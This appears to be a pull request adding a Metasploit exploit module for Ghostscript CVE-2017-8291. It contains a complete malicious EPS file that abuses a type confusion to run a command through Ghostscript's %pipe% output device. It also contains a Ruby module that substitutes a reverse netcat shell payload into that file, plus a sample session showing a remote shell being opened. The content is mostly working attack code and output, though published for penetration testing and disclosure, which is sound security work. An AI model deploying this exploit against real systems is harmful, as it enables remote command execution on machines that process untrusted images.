### PR TITLE
Ghostscript CVE-2017-8291 module based on the public PoC

### DIFF
--- a/data/exploits/CVE-2017-8291/msf.eps
+++ b/data/exploits/CVE-2017-8291/msf.eps
@@ -1,0 +1,101 @@
+%!PS-Adobe-3.0 EPSF-3.0
+%%BoundingBox: -0 -0 100 100
+
+
+/size_from  10000      def
+/size_step    500      def
+/size_to   65000      def
+/enlarge    1000      def
+
+%/bigarr 65000 array def
+
+0
+size_from size_step size_to {
+    pop
+    1 add
+} for
+
+/buffercount exch def
+
+/buffersizes buffercount array def
+
+
+0
+size_from size_step size_to {
+    buffersizes exch 2 index exch put
+    1 add
+} for
+pop
+
+/buffers buffercount array def
+
+0 1 buffercount 1 sub {
+    /ind exch def
+    buffersizes ind get /cursize exch def
+    cursize string /curbuf exch def
+    buffers ind curbuf put
+    cursize 16 sub 1 cursize 1 sub {
+        curbuf exch 255 put
+    } for
+} for
+
+
+/buffersearchvars [0 0 0 0 0] def
+/sdevice [0] def
+
+enlarge array aload
+
+{
+    .eqproc
+    buffersearchvars 0 buffersearchvars 0 get 1 add put
+    buffersearchvars 1 0 put
+    buffersearchvars 2 0 put
+    buffercount {
+        buffers buffersearchvars 1 get get
+        buffersizes buffersearchvars 1 get get
+        16 sub get
+        254 le {
+            buffersearchvars 2 1 put
+            buffersearchvars 3 buffers buffersearchvars 1 get get put
+            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
+        } if
+        buffersearchvars 1 buffersearchvars 1 get 1 add put
+    } repeat
+
+    buffersearchvars 2 get 1 ge {
+        exit
+    } if
+    %(.) print
+} loop
+
+.eqproc
+.eqproc
+.eqproc
+sdevice 0
+currentdevice
+buffersearchvars 3 get buffersearchvars 4 get 16#7e put
+buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
+buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
+put
+
+
+buffersearchvars 0 get array aload
+
+sdevice 0 get
+16#3e8 0 put
+
+sdevice 0 get
+16#3b0 0 put
+
+sdevice 0 get
+16#3f0 0 put
+
+
+currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
+.putdeviceparams
+1 true .outputpage
+.rsdparams
+%{ } loop
+0 0 .quit
+%asdf
+

--- a/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb
+++ b/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb
@@ -1,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Ghostscript Type Confusion Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a type confusion vulnerability in Ghostscript that can
+        be exploited to obtain arbitrary command execution. This vulnerability affects
+        Ghostscript version 9.2.1 and earlier and can be exploited through libraries
+        such as ImageMagick and Pillow.
+      },
+      'Author'          => [
+        'Atlassian Security Team', # Vulnerability discovery
+        'hdm'                      # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2017-8291},
+        %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
+        %w{URL http://seclists.org/oss-sec/2017/q2/148},
+        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
+        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
+      ],
+      'DisclosureDate'  => 'Apr 27 2017',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27\x5c)(", # ", ', \, (, and )
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['EPS file',  template: 'msf.eps']
+      ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {
+        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
+        'LHOST'                 => Rex::Socket.source_address,
+        'DisablePayloadHandler' => false,
+        'WfsDelay'              => 9001
+      }
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
+    ])
+  end
+
+  # Example usage from the bug tracker:
+  # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
+
+  def exploit
+    file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
+  end
+
+  def template
+    ::File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
+      target[:template]
+    ))
+  end
+
+end


### PR DESCRIPTION
This module exploits a type confusion error in Ghostscript 9.21 and below. It is based on the public proof-of-concept attached to the original ticket in the bug tracker @ https://bugs.ghostscript.com/show_bug.cgi?id=697808.

## Verification
- [x] Start `msfconsole`
- [x] `use exploit/unix/fileformat/ghostscript_type_confusion`
- [x] `exploit`
- [x] In a shell, run: ```gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f /home/hdm/.msf4/local/msf.eps```
- [x] **Verify** that a session has been created

Sample run:
```
msf > use exploit/unix/fileformat/ghostscript_type_confusion 
msf exploit(ghostscript_type_confusion) > exploit

[*] Started reverse TCP handler on 192.168.0.3:4444 
[+] msf.eps stored at /home/hdm/.msf4/local/msf.eps
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.3:54164) at 2017-04-28 10:00:31 -0500

id
uid=1000(hdm) gid=1002(hdm) groups=1002(hdm)
exit

[*] 192.168.0.3 - Command shell session 1 closed.  Reason: Died from EOFError

msf exploit(ghostscript_type_confusion) > 
```